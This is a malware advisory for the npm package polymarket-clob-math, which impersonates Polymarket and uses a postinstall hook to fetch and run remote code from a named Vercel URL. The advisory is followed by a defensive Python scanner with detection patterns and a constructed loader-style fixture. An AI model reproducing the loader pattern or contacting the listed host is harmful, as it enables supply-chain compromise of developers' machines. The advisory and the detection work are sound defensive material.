
MAL-2026-6556

Malicious code in polymarket-clob-math (npm)

Details

## Source: amazon-inspector (d67023e54ba355e9c82fd2a05d2d2448657a3ea9415ff18d3c4669a9fc0afb42)

polymarket-clob-math@1.0.4 ships a postinstall lifecycle script that performs an install-time remote-code-execution drop. On `npm install`, the script fetches a JSON config from https://datasecure-service.vercel.app/config/clob-math.json (a non-publisher Vercel host repurposed as the package's `homepage`), resolves a tarball URL from that config, downloads and extracts the tarball, runs `npm install` inside the extracted directory, then `require()`s a file from the bundle and invokes it (`syncSession()`). The fetched bytes are unpinned, unhashed, mutable, and served from a domain unrelated to any Polymarket or publisher infrastructure. Internal naming (`PSM_PEER_URL`, `runPeerSync`, `peer-math.js`, `syncSession`, and the warning `[polymarket-stake-math] install check skipped`) frames the loader as a benign peer-dependency sync, and the package name plus README branding (`polymarket-stake-math`, Kelly stake sizing for Polymarket binary markets) impersonate the Polymarket CLOB ecosystem to attract installs. Installing this package executes arbitrary attacker-controlled JavaScript on the installer's machine.

Affected packages

npm / polymarket-clob-math
Introduced in: 0

No fixed version published yet for polymarket-clob-math (npm). Pin to a known-safe version or switch to an alternative.
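The install-time loader pattern in the details above (a lifecycle hook that fetches a config, pulls a tarball, runs a nested install and `require()`s the result) can be hunted for in a local `node_modules` tree. The following is an added example, not code from the advisory or from any Polymarket project; the package names, file names and URL in the fixture are constructed stand-ins.

```python
import json, os, re, tempfile

LIFECYCLE = ("preinstall", "install", "postinstall")
# Indicators of the loader pattern: remote URL, archive extraction, non-literal require(), nested exec.
INDICATORS = {
    "remote_fetch": re.compile(r"https?://"),
    "archive_extract": re.compile(r"\btar\b|extract|\.tgz\b"),
    "dynamic_require": re.compile(r"require\(\s*[^'\")]"),
    "nested_exec": re.compile(r"npm\s+install|execSync|spawn"),
}

def audit_package(pkg_dir):
    """Return (lifecycle hooks, sorted indicator names) for one package directory."""
    with open(os.path.join(pkg_dir, "package.json")) as f:
        scripts = json.load(f).get("scripts", {})
    hooks = {k: v for k, v in scripts.items() if k in LIFECYCLE}
    text = "\n".join(hooks.values())
    for cmd in hooks.values():  # hook runs `node <file>`: scan that file's source too
        m = re.match(r"node\s+(\S+)", cmd)
        if m and os.path.isfile(os.path.join(pkg_dir, m.group(1))):
            with open(os.path.join(pkg_dir, m.group(1))) as f:
                text += "\n" + f.read()
    return hooks, sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def audit_node_modules(root, threshold=2):
    """Map package name -> indicators, for packages whose hooks hit >= threshold."""
    findings = {}
    for name in sorted(os.listdir(root)):
        pkg = os.path.join(root, name)
        if not os.path.isfile(os.path.join(pkg, "package.json")):
            continue  # skips .bin and scoped @org dirs (scoped packages are not descended here)
        hooks, hits = audit_package(pkg)
        if hooks and len(hits) >= threshold:
            findings[name] = hits
    return findings

def build_fixture():
    """Constructed node_modules tree: one loader-style package mirroring the advisory's steps, one benign."""
    root = tempfile.mkdtemp()
    loader = ("const cfg = JSON.parse(get('https://example.invalid/config.json'));\n"
              "extract(download(cfg.tarball), dir); execSync('npm install', {cwd: dir});\n"
              "require(path.join(dir, cfg.entry)).syncSession();\n")
    pkgs = {"loader-pkg": ({"postinstall": "node install.js"}, {"install.js": loader}),
            "benign-pkg": ({"postinstall": "node-gyp rebuild"}, {})}
    for name, (scripts, files) in pkgs.items():
        os.makedirs(os.path.join(root, name))
        files["package.json"] = json.dumps({"name": name, "scripts": scripts})
        for fname, body in files.items():
            with open(os.path.join(root, name, fname), "w") as f:
                f.write(body)
    return root
```

Setting `ignore-scripts=true` in `.npmrc` stops such hooks from running at all, at the cost of packages that legitimately need an install-time build step.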
